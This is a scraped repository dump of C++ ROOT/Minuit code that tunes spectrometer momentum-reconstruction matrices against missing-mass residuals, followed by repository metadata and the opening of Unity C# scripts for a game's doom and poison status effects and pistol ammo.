//////////&&&&&&&&&&&&&&&&&&&&&&%%%%%%%%%%$$$$$$$$$$$ Dec 01, 2020 &&&&&&&&&&&&&&&&&&&&&&&&&&&&&
TFile* f_new = new TFile("./output_root/SEPT17_a1LT180_a2_1550_8000.root","recreate"); // also open the f_new->Close(); aslo
h->Write();
h_2->Write();
hf->Write();
hb7->Write();
hal_20->Write();
hbal_20->Write();
HT->Write();
HT_b->Write();
hal_15->Write();
hbal_15->Write();
htt->Write();
hb2->Write();
h_al->Write();
hb_al->Write();
h125_6->Write();
h125_6b->Write();
h1_q1->Write();
h1_qb1->Write();
h25_2->Write();
h25_2b->Write();
h1_03->Write();
h1_03b->Write();
h1_2->Write();
h1_2b->Write();
h1_01->Write();
h1_01b->Write();
h1_may->Write();
h1b_may->Write();
f_new->Close();
//++++++++++++++++++++++++++++++++++++++++++++++++++++++++
const int nite =0;
double temp[nite];
double x[nite];
if (nite>0) cout << " Tuning started: " << endl;
for(int i=0 ; i<nite ; i++){
x[i] = i+1;
// temp[i] = tune(momL_opt,i); /// open when LHRS mom matrix is tuned
temp[i] = tune(momR_opt,i); /// open when RHRS mom matrix is tuned
sprintf(tempc, "./MOM_MATRICES/RMOM5_July8_1st_%d.dat",i); // output matrix
ofstream * ofs = new ofstream(tempc);
int nppp = 0;
const int nn = 5; // 5 for 5th order 4 for 4th order jan 31
for(int i=0; i<nn+1; i++){
for(int e=0; e<nn+1; e++){
for(int d=0; d<nn+1; d++){
for(int c=0; c<nn+1; c++){
for(int b=0; b<nn+1; b++){
for(int a=0; a<nn+1; a++){
if(a+b+c+d+e==i){
*ofs <<momR_opt[nppp] // MomR_opt[] for RHRS tune and MomL_opt[] for LHRS tune
<< " " << a
<< " " << b
<< " " << c
<< " " << d
<< " " << e << endl;
nppp++;
}
}
}
}
}
}
}
ofs->close();
ofs->clear();
cout << temp[i]<<endl;
}
if(nite>0){
TGraph * gr = new TGraph(nite,x,temp);
TCanvas * c4 = new TCanvas("c4","",600,600);
gr->Draw("*la");
}
} //end of main function
//////////////////////////////////////////////////
double calcf2t_th(double* P, double xf, double xpf,
                  double yf, double ypf, double zt)
//////////////////////////////////////////////////
{
  // -----4th order -----
  // Evaluate the 4th-order reconstruction polynomial in the five
  // focal-plane variables (xf, xpf, yf, ypf, zt).  P holds the matrix
  // coefficients ordered by total order n = a+b+c+d+e, with the exponent
  // tuple enumerated in the fixed (e, d, c, b, a) nesting below — this
  // order must match the matrix file layout.
  const int kOrder = 4;   // maximum total polynomial order
  const int kMaxXf = 4, kMaxXpf = 4, kMaxYf = 4, kMaxYpf = 4, kMaxZt = 4;

  double result = 0.0;
  int ipar = 0;           // running index into P, tied to the loop order

  for (int n = 0; n <= kOrder; n++) {
    for (int e = 0; e <= n; e++) {
      for (int d = 0; d <= n; d++) {
        for (int c = 0; c <= n; c++) {
          for (int b = 0; b <= n; b++) {
            for (int a = 0; a <= n; a++) {
              if (a + b + c + d + e != n) continue;
              double term = 0.0; // terms beyond the per-variable limits contribute nothing
              if (a <= kMaxXf && b <= kMaxXpf && c <= kMaxYf &&
                  d <= kMaxYpf && e <= kMaxZt) {
                term = pow(xf, double(a)) * pow(xpf, double(b)) *
                       pow(yf, double(c)) * pow(ypf, double(d)) *
                       pow(zt, double(e));
              }
              result += term * P[ipar];
              ipar++;
            }
          }
        }
      }
    }
  }
  return result;
}
// ////////////////////////////////////////////////
//////////////////////////////////////////////////
double calcf2t_ph(double* P, double xf, double xpf,
                  double yf, double ypf, double zt)
//////////////////////////////////////////////////
{
  // -----4th order -----
  // Same 4th-order polynomial evaluation as calcf2t_th, used for the
  // phi reconstruction matrix.  P is indexed in the fixed enumeration
  // order of the nested loops (total order n = a+b+c+d+e ascending).
  const int maxOrder = 4;
  const int limXf = 4, limXpf = 4, limYf = 4, limYpf = 4, limZt = 4;

  double sum  = 0.0;
  int    idx  = 0;   // coefficient index; advances once per (a,b,c,d,e) tuple

  for (int n = 0; n <= maxOrder; ++n) {
    for (int e = 0; e <= n; ++e) {
      for (int d = 0; d <= n; ++d) {
        for (int c = 0; c <= n; ++c) {
          for (int b = 0; b <= n; ++b) {
            for (int a = 0; a <= n; ++a) {
              if (a + b + c + d + e == n) {
                double monomial;
                if (a <= limXf && b <= limXpf && c <= limYf &&
                    d <= limYpf && e <= limZt) {
                  monomial = pow(xf, double(a)) * pow(xpf, double(b)) *
                             pow(yf, double(c)) * pow(ypf, double(d)) *
                             pow(zt, double(e));
                } else {
                  monomial = 0.0;
                }
                sum += monomial * P[idx];
                ++idx;
              }
            }
          }
        }
      }
    }
  } // n =
  return sum;
}
//////////////////////////////////////////////////
double calcf2t_mom(double* P, double xf, double xpf,
                   double yf, double ypf, double zt)
//////////////////////////////////////////////////
{ // -----5th order -----
  // Momentum reconstruction polynomial: evaluates a 5th-order expansion
  // in the focal-plane variables (xf, xpf, yf, ypf, zt) with coefficient
  // array P.  P is ordered by total order n = a+b+c+d+e, enumerated in
  // the fixed (e, d, c, b, a) nesting below; this order must match the
  // matrix file written in main().
  const int nMatT=5;
  const int nXf=5;
  const int nXpf=5;
  const int nYf=5;
  const int nYpf=5;
  const int nZt=5;

  double Y=0.;
  double x=1.;
  int npar=0;
  int a=0,b=0,c=0,d=0,e=0;

  for (int n=0;n<nMatT+1;n++){
    for(e=0;e<n+1;e++){
      for (d=0;d<n+1;d++){
        for (c=0;c<n+1;c++){
          for (b=0;b<n+1;b++){
            for (a=0;a<n+1;a++){
              if (a+b+c+d+e==n){
                if (a<=nXf && b<=nXpf && c<=nYf && d<=nYpf && e<=nZt){
                  x = pow(xf,double(a))*pow(xpf,double(b))*
                      pow(yf,double(c))*pow(ypf,double(d))*pow(zt,double(e));
                }
                else{
                  // BUG FIX: the original left this branch empty, so an
                  // out-of-limit term would silently reuse the previous x
                  // (a stale monomial).  Unreachable with the current
                  // limits (all equal nMatT), but corrected for safety and
                  // for consistency with calcf2t_th / calcf2t_ph.
                  x = 0.;
                }
                Y += x*P[npar];
                npar++;
              }
            }
          }
        }
      }
    }
  }// n =
  return Y;
}
// missing mass function definition====================
double CalcMM(double ee, double* pvec_ep, double* pvec_k, double mt){ // Dec 3,2019
double pe = ee;
double Ee = sqrt(me*me + pe*pe);
Ee = Ee - 0.000125; // GeV /// 0.000163;
TVector3 vec_e (0.0, 0.0, pe);
double pep = pvec_ep[0];
double xpep = pvec_ep[1];
double ypep = pvec_ep[2];
double px_ep, py_ep, pz_ep;
pz_ep = pep / sqrt(1.0 + xpep*xpep + ypep*ypep);
px_ep = xpep * pz_ep;
py_ep = ypep * pz_ep;
TVector3 vec_ep (px_ep, py_ep, pz_ep);
vec_ep.RotateX(hrs_ang);
double Eep = sqrt(pep*pep + me*me);
double pk = pvec_k[0];
double xpk = pvec_k[1];
double ypk = pvec_k[2];
double px_k, py_k, pz_k;
pz_k = pk / sqrt(1.0 + xpk*xpk + ypk*ypk);
px_k = xpk * pz_k;
py_k = ypk * pz_k;
TVector3 vec_k (px_k, py_k, pz_k);
vec_k.RotateX(-hrs_ang);
double Ek = sqrt(pk*pk + mk*mk);
double missingE2 = 0.0, missingP2 = 0.0, missingM2 = 0.0;
missingE2 = pow(Ee + mt - Ek - Eep, 2.0);
missingP2 = (vec_e - vec_ep - vec_k) * (vec_e - vec_ep - vec_k);
missingM2 = missingE2 - missingP2;
double MissingMass = 0.0;
MissingMass = sqrt(missingM2);
return MissingMass;
}
//############### up to hear missing mass #####################
// #############################################################
double tune(double* pa, int j) // tune fun defn
// #############################################################
{
double chi2 = 0.0;
double arglist[10];
int ierflg = 0;
int allparam =Mom_Par; // for momentum tune jan 31
TMinuit* minuit = new TMinuit(allparam);
minuit->SetFCN(fcn); // very imp function setying for chi square
// ~~~ Chi-square ~~~~
arglist[0] = 1;
minuit -> mnexcm("SET ERR",arglist,1,ierflg);
minuit -> SetPrintLevel(-1);
double start[allparam];
double step[allparam];
double LLim[allparam];
double ULim[allparam];
char pname[500];
for(int i=0 ; i<allparam ; i++){
sprintf(pname,"param_%d",i+1);
start[i] = pa[i];
// step[i] = 1.0e-3; /// Original
step[i] = 2.0*0.5; // for rough matrix, when matrix is far from reality
LLim[i] = pa[i] -10; // pa[i]*0.8; // KI
ULim[i] = pa[i] + 10; //pa[i]*0.8; // KI
// LLim[i] = pa[i] - pa[i]*0.8; // KI
// ULim[i] = pa[i] + pa[i]*0.8; // KI
minuit -> mnparm(i,pname,start[i],step[i],LLim[i],ULim[i],ierflg);
}
// ~~~~ Strategy ~~~~
// arglist[0] = 2.0; // was active before
arglist[0] = 1.0; // KI
minuit->mnexcm("SET STR",arglist,1,ierflg);
// ~~~~ Migrad + Simplex ~~~~ one of the way to get optimized parameter
arglist[0] = 20000;
arglist[1] = 0.01; // To make more presise
minuit -> mnexcm("MINImize",arglist,2,ierflg);
double amin,edm,errdef;
int nvpar,nparx,icstat;
double er;
minuit -> mnstat(amin,edm,errdef,nvpar,nparx,icstat);
minuit -> mnprin(0,amin);
if(amin>0) chi2=amin;
for(int i=0 ; i<allparam ; i++){
// / minuit -> GetParameter(i,momL_opt[i],er); // open this line only when LHRS momentum matrix is tuned
minuit -> GetParameter(i,momR_opt[i],er); // open this line only when RHRS momentum matrix is tuned
}
return chi2;
}
// #############################################################
void fcn(int &nPar, double* /*grad*/, double &fval, double* param, int /*iflag*/)
// #############################################################
// MINUIT objective (FCN) callback.  `param` is the trial set of momentum
// matrix coefficients; the weighted chi-square summed over four event
// samples is returned through `fval`.  Reads file-scope event arrays
// (x, xp, y, yp, z_recon, phir, phil, p10..p16, foil_flag, Lambda_real,
// ntune_event and their _2/_3/_4 variants) filled earlier in main().
{
double chi2 = 0.0;
double chi_12 = 0.0;
double XFP, XpFP;
double YFP, YpFP;
const double sigma = 0.0045;
double ref_mm = 0.0;
double residual = 0.0;
double par_ep[3];
double par_k[3];
double halla_p;
// Only element [0] of the following work arrays is ever used.
double momr[100];
double moml[100];
double z_av;
double z_av_sc;
double rvz;
double ph1;
double th1;
double ph2;
double th2;
double delta_pk[100];
double delta_pep[100];
double pk_real[100];
double pep_real[100];
double MM;
double THL;
double PHL;
double THR;
double PHR;
// (((((((((((((((((((((((((((((((((((((((( t2 (((((((((((((((((((((((((((((((((
double chi_22 = 0.0;
double XFP_2, XpFP_2;
double YFP_2, YpFP_2;
double ref_mm_2 = 0.0;
double residual_2 = 0.0;
double par_ep_2[3];
double par_k_2[3];
double halla_p_2;
double momr_2[100];
double moml_2[100];
double z_av_2;
double z_av_sc_2;
double ph1_2;
double th1_2;
double ph2_2;
double th2_2;
double delta_pk_2[100];
double delta_pep_2[100];
double pk_real_2[100];
double pep_real_2[100];
double MM_2;
double THL_2;
double PHL_2;
double THR_2;
double PHR_2;
//))))))))))))))))))))))))))))))))))))))))))))) t2 ))))))))))))))))))))))))))))
// (((((((((((((((((((((((((((((((((((((((( t3 (((((((((((((((((((((((((((((((((
double chi_33 = 0.0;
double XFP_3, XpFP_3;
double YFP_3, YpFP_3;
double ref_mm_3 = 0.0;
double residual_3 = 0.0;
double par_ep_3[3];
double par_k_3[3];
double halla_p_3;
double momr_3[100];
double moml_3[100];
double z_av_3;
double z_av_sc_3;
double ph1_3;
double th1_3;
double ph2_3;
double th2_3;
double delta_pk_3[100];
double delta_pep_3[100];
double pk_real_3[100];
double pep_real_3[100];
double MM_3;
double THL_3;
double PHL_3;
double THR_3;
double PHR_3;
//))))))))))))))))))))))))))))))))))))))))))))) t3 ))))))))))))))))))))))))))))
// (((((((((((((((((((((((((((((((((((((((( to include the Al/HT data for tune Jan 07, 2020 (((((((((((((((((((((((((((((((((
double chi_44 = 0.0;
double XFP_4, XpFP_4;
double YFP_4, YpFP_4;
double ref_mm_4 = 0.0;
double residual_4 = 0.0;
double par_ep_4[3];
double par_k_4[3];
double halla_p_4;
double momr_4[100];
double moml_4[100];
double z_av_4;
double z_av_sc_4;
double ph1_4;
double th1_4;
double ph2_4;
double th2_4;
double delta_pk_4[100];
double delta_pep_4[100];
double pk_real_4[100];
double pep_real_4[100];
double MM_4;
double THL_4;
double PHL_4;
double THR_4;
double PHR_4;
//))))))))))))))))))))))))))))))))))))))))))))) up here is _4 ))))))))))))))))))))))))))))
// ---- Sample 1: Lambda events.  For each event, rebuild the RHRS momentum
// from the trial matrix `param`, form the missing mass, and accumulate the
// weighted squared residual against the reference mass. ----
for(int i=0; i<ntune_event; i++){
residual = 0.0;
ref_mm = 0.0;
ref_mm = Lambda_real[foil_flag[i]];
ref_mm = ref_mm/1000.0; // MeV -> GeV
XFP = x[i];
XpFP = xp[i];
YFP = y[i];
YpFP = yp[i];
z_av = z_recon[i];
ph1 = phir[i]; // open when calibrate the Momentum
ph1= -ph1;
ph2 = phil[i];
ph2 = -ph2;
// Normalize focal-plane variables to the scaled range used by the matrix.
XFP =(XFP -XFPm)/XFPr;
XpFP =(XpFP-XpFPm)/XpFPr;
YFP =(YFP -YFPm)/YFPr;
YpFP =(YpFP-YpFPm)/YpFPr;
z_av_sc = (z_av - Ztm)/Ztr;
// For the LHRS momentum tunning
moml[0] = calcf2t_mom(param, XFP, XpFP, YFP, YpFP, z_av_sc);
moml[0] = moml[0]*Momr+Momm; // undo the scaling back to GeV/c
double hang;
// Energy-loss correction, parameterized by target z and horizontal angle.
if( z_av<8.0e-2){
hang = ph2 + hrs_ang;
hang = -hang;
delta_pep[0] = -1.35758*sin(-4.59571* hang) + 2.09093;
}
else{
hang = ph2 + hrs_ang;
hang = -hang;
delta_pep[0] = 6.23409e-3*hang + 4.03363e-1;
}
pep_real[0] = moml[0] + delta_pep[0]/1000.0; //LHRS momentum at the reaction point in GeV
// par_ep[0] = pep_real[0];// When LHRS momentum tuned keep this line open otherwise comment it
par_ep[0] = p10[i];// comment this line if the previous line is open or not commented
par_ep[1] = p11[i];
par_ep[2] = p12[i];
// for the RHRS momentum tunning
momr[0] = calcf2t_mom(param, XFP, XpFP, YFP, YpFP, z_av_sc);
momr[0] = momr[0]*Momr+Momm;
double hang1;
if(z_av<8.0e-2){
hang1= ph1 - hrs_ang;
delta_pk[0] =-1.31749*sin(-4.61513* hang1) + 2.03687;
}
else{
hang1= ph1 - hrs_ang;
delta_pk[0] = 3.158e-2*hang1 + 4.05819e-1;
}
pk_real[0] = momr[0] + delta_pk[0]/1000.0;
par_k[0] = pk_real[0];// open this line only when RHRS momentum matrix tuned and the next line closed
// par_k[0] = p13[i]; // if previous line is open (not commented), comment this line
par_k[1] = p14[i]; // jan 31
par_k[2] = p15[i];
halla_p = p16[i];
MM = CalcMM(halla_p, par_ep, par_k, mp);
residual = MM-ref_mm;
// chi_12 = chi_12 + pow(residual,2.0);
/////// if need to use the sigma statistical weigh
// Per-foil weights: foil 0 gets weight 6, all others weight 10.
if(foil_flag[i] ==0)
{chi_12 = chi_12 +6*pow(residual,2.0);}
else
{chi_12 = chi_12 +10*pow(residual,2.0);}
}
// (((((((((((((((((((((((((((((((((((((((( t2 (((((((((((((((((((((((((((((((((
// ---- Sample 2: H/T events.  Same reconstruction, with an extra LHRS
// momentum rescale (2.217925/2.1) specific to the H/T and tritium data. ----
for(int i=0; i<ntune_event_2; i++){
residual_2 = 0.0;
ref_mm_2 = 0.0;
ref_mm_2 = Lambda_real_2[foil_flag_2[i]];
ref_mm_2 = ref_mm_2/1000.0;
XFP_2 = x_2[i];
XpFP_2 = xp_2[i];
YFP_2 = y_2[i];
YpFP_2 = yp_2[i];
z_av_2 = z_recon_2[i];
ph1_2 = phir_2[i]; // open when calibrate the Momentum
ph1_2 = - ph1_2;
ph2_2 = phil_2[i];
ph2_2 = - ph2_2;
XFP_2 =(XFP_2 -XFPm)/XFPr;
XpFP_2 =(XpFP_2-XpFPm)/XpFPr;
YFP_2 =(YFP_2 -YFPm)/YFPr;
YpFP_2 =(YpFP_2-YpFPm)/YpFPr;
z_av_sc_2 = (z_av_2 - Ztm)/Ztr;
// For the LHRS momentum tunning
moml_2[0] = calcf2t_mom(param, XFP_2, XpFP_2, YFP_2, YpFP_2, z_av_sc_2);
moml_2[0] = moml_2[0]*Momr+Momm;
moml_2[0] = moml_2[0]*2.217925/2.1; //for H/T and tritium only
double hang2;
if( z_av_2<8.0e-2){
hang2 = ph2_2 + hrs_ang;
hang2 = -hang2;
delta_pep_2[0] = -1.35758*sin(-4.59571* hang2) + 2.09093;
}
else{
hang2 = ph2_2 + hrs_ang;
hang2 = -hang2;
delta_pep_2[0] = 6.23409e-3*hang2 + 4.03363e-1;
}
pep_real_2[0] = moml_2[0] + delta_pep_2[0]/1000.0; //LHRS momentum at the reaction point in GeV
// par_ep_2[0] = pep_real_2[0];// Wwhen LHRS momentum tuned, uncoment this line
par_ep_2[0] = p10_2[i];
par_ep_2[1] = p11_2[i];
par_ep_2[2] = p12_2[i];
// for the RHRS momentum tunning
momr_2[0] = calcf2t_mom(param, XFP_2, XpFP_2, YFP_2, YpFP_2, z_av_sc_2);
momr_2[0] = momr_2[0]*Momr+Momm;
double hang3;
if(z_av_2<8.0e-2){
hang3 = ph1_2 - hrs_ang;
delta_pk_2[0] =-1.31749*sin(-4.61513* hang3) + 2.03687;
}
else{
hang3 = ph1_2 - hrs_ang;
delta_pk_2[0] = 3.158e-2*hang3 + 4.05819e-1;
}
pk_real_2[0] = momr_2[0] + delta_pk_2[0]/1000.0;
par_k_2[0] = pk_real_2[0];// when RHRS matrix tuned
// par_k_2[0] = p13_2[i];
par_k_2[1] = p14_2[i]; // jan 31
par_k_2[2] = p15_2[i];
halla_p_2 = p16_2[i];
MM_2 = CalcMM(halla_p_2, par_ep_2, par_k_2, mp);
residual_2 = MM_2-ref_mm_2;
chi_22 = chi_22 +25*pow(residual_2,2.0);
// chi_22 = chi_22 +pow(residual_2,2.0);
}
//))))))))))))))))))))))))))))))))))))))))))))) t2 ))))))))))))))))))))))))))))
// (((((((((((((((((((((((((((((((((((((((( t3 T/T data for Al ((((((((((((((((((((((((((((((
// ---- Sample 3: T/T aluminum events.  Uses the Al target mass, fixed
// energy-loss offsets (May 07, 2021 values) and a constant MM shift. ----
for(int i=0; i<ntune_event_3; i++){
residual_3 = 0.0;
ref_mm_3 = 0.0;
ref_mm_3 = Lambda_real_3[foil_flag_3[i]];
ref_mm_3 = ref_mm_3/1000.0;
XFP_3 = x_3[i];
XpFP_3 = xp_3[i];
YFP_3 = y_3[i];
YpFP_3 = yp_3[i];
z_av_3 = z_recon_3[i];
ph1_3 = phir_3[i]; // open when calibrate the Momentum
ph1_3 = - ph1_3;
ph2_3 = phil_3[i];
ph2_3 = - ph2_3;
XFP_3 =(XFP_3 -XFPm)/XFPr;
XpFP_3 =(XpFP_3-XpFPm)/XpFPr;
YFP_3 =(YFP_3 -YFPm)/YFPr;
YpFP_3 =(YpFP_3-YpFPm)/YpFPr;
z_av_sc_3 = (z_av_3 - Ztm)/Ztr;
// For the LHRS momentum tunning
moml_3[0] = calcf2t_mom(param, XFP_3, XpFP_3, YFP_3, YpFP_3, z_av_sc_3);
moml_3[0] = moml_3[0]*Momr+Momm;
moml_3[0] = moml_3[0]*2.217925/2.1; //for H/T and tritium only
double hang9;
if( z_av_3<8.0e-2){
hang9 = ph2_3 + hrs_ang;
hang9 = -hang9;
delta_pep_3[0] = -1.35758*sin(-4.59571* hang9) + 2.09093;
delta_pep_3[0] = delta_pep_3[0] + 0.0524; /// may 07, 2021************
}
else{
hang9 = ph2_3 + hrs_ang;
hang9 = -hang9;
// delta_pep_3[0] = 6.23409e-3*hang9 + 4.03363e-1;
delta_pep_3[0] = 0.3027;/// may 07, 2021************
}
pep_real_3[0] = moml_3[0] + delta_pep_3[0]/1000.0; //LHRS momentum at the reaction point in GeV
// par_ep_3[0] = pep_real_3[0];// Wwhen LHRS momentum tuned, uncoment this line
par_ep_3[0] = p10_3[i];
par_ep_3[1] = p11_3[i];
par_ep_3[2] = p12_3[i];
// for the RHRS momentum tunning
momr_3[0] = calcf2t_mom(param, XFP_3, XpFP_3, YFP_3, YpFP_3, z_av_sc_3);
momr_3[0] = momr_3[0]*Momr+Momm;
double hang10;
if(z_av_3<8.0e-2){
hang10 = ph1_3 - hrs_ang;
delta_pk_3[0] =-1.31749*sin(-4.61513* hang10) + 2.03687;
delta_pk_3[0] = delta_pk_3[0] + 0.0512; /// may 07, 2021************
}
else{
hang10 = ph1_3 - hrs_ang;
// delta_pk_3[0] = 3.158e-2*hang10 + 4.05819e-1;
delta_pk_3[0] = 0.2993; /// may 07, 2021************
}
pk_real_3[0] = momr_3[0] + delta_pk_3[0]/1000.0;
par_k_3[0] = pk_real_3[0];// when RHRS matrix tuned
// par_k_3[0] = p13_3[i];
par_k_3[1] = p14_3[i]; // jan 31
par_k_3[2] = p15_3[i];
halla_p_3 = p16_3[i];
MM_3 = CalcMM(halla_p_3, par_ep_3, par_k_3, m_Al); //need to adjust
MM_3 = MM_3 -25.3123; // constant offset applied to the Al missing mass
residual_3 = MM_3-ref_mm_3;
if(foil_flag_3[i]==0)
{chi_33 = chi_33 +25*pow(residual_3,2.0);}
else if(foil_flag_3[i]== 1)
{chi_33 = chi_33 +25*pow(residual_3,2.0);}
else
{chi_33 = chi_33 +15*pow(residual_3,2.0);}
// chi_33 = chi_33 +9*pow(residual_3,2.0);/// colsed on May 24, 2021
}
// ((((((((((((((((((((((((4(((((((((((((((( _4 H/T data for Al Jan 07, 2020((((((((((((((((((((((((((((((
// ---- Sample 4: H/T aluminum events.  Mirrors sample 3 with its own
// energy-loss offsets. ----
for(int i=0; i<ntune_event_4; i++){
residual_4 = 0.0;
ref_mm_4 = 0.0;
ref_mm_4 = Lambda_real_4[foil_flag_4[i]];
ref_mm_4 = ref_mm_4/1000.0;
XFP_4 = x_4[i];
XpFP_4 = xp_4[i];
YFP_4 = y_4[i];
YpFP_4 = yp_4[i];
z_av_4 = z_recon_4[i];
ph1_4 = phir_4[i]; // open when calibrate the Momentum
ph1_4 = - ph1_4;
ph2_4 = phil_4[i];
ph2_4 = - ph2_4;
XFP_4 =(XFP_4 -XFPm)/XFPr;
XpFP_4 =(XpFP_4-XpFPm)/XpFPr;
YFP_4 =(YFP_4 -YFPm)/YFPr;
YpFP_4 =(YpFP_4-YpFPm)/YpFPr;
z_av_sc_4 = (z_av_4 - Ztm)/Ztr;
// For the LHRS momentum tunning
moml_4[0] = calcf2t_mom(param, XFP_4, XpFP_4, YFP_4, YpFP_4, z_av_sc_4);
moml_4[0] = moml_4[0]*Momr+Momm;
moml_4[0] = moml_4[0]*2.217925/2.1; //for H/T and tritium only
double hang9;
if(z_av_4<8.0e-2){
hang9 = ph2_4 + hrs_ang;
hang9 = -hang9;
delta_pep_4[0] = -1.35758*sin(-4.59571* hang9) + 2.09093;
delta_pep_4[0] = delta_pep_4[0] + 0.0637;/// may 07, 2021************
}
else{
hang9 = ph2_4 + hrs_ang;
hang9 = -hang9;
// delta_pep_4[0] = 6.23409e-3*hang9 + 4.03363e-1;
delta_pep_4[0] = 0.3004;/// may 07, 2021************
}
pep_real_4[0] = moml_4[0] + delta_pep_4[0]/1000.0; //LHRS momentum at the reaction point in GeV
// par_ep_4[0] = pep_real_4[0];// Wwhen LHRS momentum tuned, uncomment this line
par_ep_4[0] = p10_4[i];
par_ep_4[1] = p11_4[i];
par_ep_4[2] = p12_4[i];
//// for the RHRS momentum tunning
momr_4[0] = calcf2t_mom(param, XFP_4, XpFP_4, YFP_4, YpFP_4, z_av_sc_4);
momr_4[0] = momr_4[0]*Momr+Momm;
double hang10;
if(z_av_4<8.0e-2){
hang10 = ph1_4 - hrs_ang;
delta_pk_4[0] =-1.31749*sin(-4.61513* hang10) + 2.03687;
delta_pk_4[0] = delta_pk_4[0] + 0.0627;/// may 07, 2021************
}
else{
hang10 = ph1_4 - hrs_ang;
// delta_pk_4[0] = 3.158e-2*hang10 + 4.05819e-1;
delta_pk_4[0] = 0.2962;/// may 07, 2021************
}
pk_real_4[0] = momr_4[0] + delta_pk_4[0]/1000.0;
par_k_4[0] = pk_real_4[0];// when RHRS matrix tuned un coment this line
// par_k_4[0] = p13_4[i];
par_k_4[1] = p14_4[i]; // jan 31
par_k_4[2] = p15_4[i];
halla_p_4 = p16_4[i];
MM_4 = CalcMM(halla_p_4, par_ep_4, par_k_4, m_Al); //need to adjust
MM_4 = MM_4 -25.3123;
residual_4 = MM_4-ref_mm_4;
if(foil_flag_4[i]==0)
{chi_44 = chi_44 +25*pow(residual_4,2.0);}
else if(foil_flag_4[i]==1)
{chi_44 = chi_44 +25*pow(residual_4,2.0);}
else
{chi_44 = chi_44 +15*pow(residual_4,2.0);}
// chi_44 = chi_44 +9*pow(residual_4,2.0);/// colsed on May 24, 2021
}
//))))))))))))))))))))))))))))))))))))))))))))) _4 Jan 07, 2020 ))))))))))))))))))))))))))))
//))))))))))))))))))))))))))))))))))))))))))))) Jan 12, 2020 ))))))))))))))))))))))))))))
// NOTE(review): the normalization divides by ntune_event (sample 1 only)
// even though chi_22/chi_33/chi_44 accumulate over the other samples —
// presumably intentional as a relative figure of merit; confirm before reuse.
chi2 = chi_12 +chi_22 + chi_33 + chi_44;
chi2 = sqrt(chi2)/(double)ntune_event/sigma;
fval = chi2;
}
| c29b044cbf20429ca60e53f4664bffc097a1d7c4 | [
"C++"
] | 1 | C++ | Bishnu04/E12-17-003-Matrices | 34a9f345310272828ea453a5bf48e79de173080a | 6b743ea6dc859a2ff6bff99979e18479d53368a4 |
refs/heads/master | <file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using TMPro;
using UnityEngine.UI;
/// <summary>
/// Tracks and applies status effects (DOOM, POISON) on the player during
/// combat and keeps their HUD counters in sync. Singleton via `instance`.
/// </summary>
public class PlayerStatusEffect : MonoBehaviour
{
    [Header("Speed Boost")]
    public float speedModifier;

    [Header("Doom")]
    public bool isDoom;
    public int doom_Counter;
    public int doom_maxCounter = 3;
    [SerializeField] TextMeshProUGUI doomText;

    [Header("Poison")]
    public bool isPoison;
    public int poison_DamagePerTick;
    public int poison_Counter;
    public float poison_Interval = 1f;
    [SerializeField] TextMeshProUGUI poisonText;
    [SerializeField] Image healthBar;

    public static PlayerStatusEffect instance;

    private void Awake()
    {
        instance = this;
    }

    private void Start()
    {
        // DOOM ticks down each time the combat menu is activated.
        CombatMenu.instance.onMenuActive.AddListener(CountdownDOOM);
    }

    /// <summary>
    /// Applies the status effects of the enemy's current action to the
    /// player. Nothing is applied when the attack missed.
    /// </summary>
    public void ApplyStatusEffect()
    {
        switch (DamageCalculator.instance.combatOutcome)
        {
            case DamageCalculator.CombatOutcome.Missed:
                break;
            default:
                if (EnemyController.instance.currentAction.POISON)
                {
                    InflictPOISON();
                }
                // FIX: removed a duplicated, empty `if (...POISON)` block that
                // followed here — it looked like a copy-paste placeholder for
                // a second effect check and had no behavior.
                break;
        }
    }

    //========= DOOM ===============================================================================================================================
    /// <summary>Starts the DOOM countdown (called by Sanity). No-op if DOOM is already active.</summary>
    public void InflictDOOM()
    {
        if (isDoom) { return; }

        isDoom = true;
        doom_Counter = doom_maxCounter;
        doomText.transform.parent.gameObject.SetActive(true);
        doomText.text = doom_Counter.ToString();
    }

    /// <summary>Clears DOOM and hides its HUD counter.</summary>
    public void RemoveDOOM()
    {
        isDoom = false;
        doomText.transform.parent.gameObject.SetActive(false);
    }

    /// <summary>Decrements the DOOM counter; reaching zero means defeat.</summary>
    public void CountdownDOOM()
    {
        if (!isDoom) { return; }

        doom_Counter--;
        doomText.text = doom_Counter.ToString();

        if (doom_Counter == 0)
        {
            // NOTE(review): only logs — actual game-over handling is not
            // implemented here; confirm where defeat is supposed to trigger.
            Debug.Log("GAME OVER!");
        }
    }

    //========= POISON =============================================================================================================================
    /// <summary>
    /// Adds poison ticks from the enemy's current action and starts the
    /// damage-over-time coroutine (the coroutine guards itself against
    /// running twice, so stacking only extends the counter).
    /// </summary>
    public void InflictPOISON()
    {
        poison_Counter += EnemyController.instance.currentAction.POISON_Counter;
        poisonText.text = poison_Counter.ToString();
        poison_DamagePerTick = EnemyController.instance.currentAction.POISON_damagePerTick;
        poisonText.transform.parent.gameObject.SetActive(true);
        StartCoroutine(PoisonDamageOverTime());
    }

    // Deals poison_DamagePerTick every 0.2s of unpaused battle time; one
    // poison counter is consumed per poison_Interval seconds of ticking.
    private IEnumerator PoisonDamageOverTime()
    {
        if (isPoison) { yield break; } // already ticking — counters were just stacked

        float timer = 0;
        poison_Interval = 1f;
        isPoison = true;

        // Tint the health bar green while poisoned; restore the color on exit.
        Color healthColor;
        healthColor = healthBar.color;
        healthBar.color = new Color32(0, 120, 0, 255);

        while (true)
        {
            yield return StartCoroutine(BattleCountdown(0.2f));
            DamageCalculator.instance.PlayerTakeDamage(poison_DamagePerTick);

            timer += 0.2f;
            if (timer >= poison_Interval)
            {
                timer = 0f;
                poison_Counter--;
                poisonText.text = poison_Counter.ToString();

                if (poison_Counter == 0)
                {
                    poisonText.transform.parent.gameObject.SetActive(false);
                    isPoison = false;
                    healthBar.color = healthColor;
                    yield break;
                }
            }
        }
    }

    //=========== HELPER =============================================================================================================================
    /// <summary>
    /// Waits until `duration` seconds of battle time have elapsed. Time spent
    /// with the combat menu open, the slider paused, or the rally ring active
    /// does not count.
    /// </summary>
    public static IEnumerator BattleCountdown(float duration)
    {
        float timer = 0;
        while (true)
        {
            if (CombatMenu.instance.isMenuActive || CombatManager.instance.pauseSlider || RallyRing.instance.isRallyActive)
            {
                yield return null;
            }
            else
            {
                timer += Time.deltaTime;
                if (timer >= duration)
                {
                    yield break;
                }
            }
            yield return null;
        }
    }
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.UI;
/// <summary>
/// Tracks the pistol's ammunition, mirrors it as HUD bullet icons, and
/// disables the pistol's combat button when the magazine is empty.
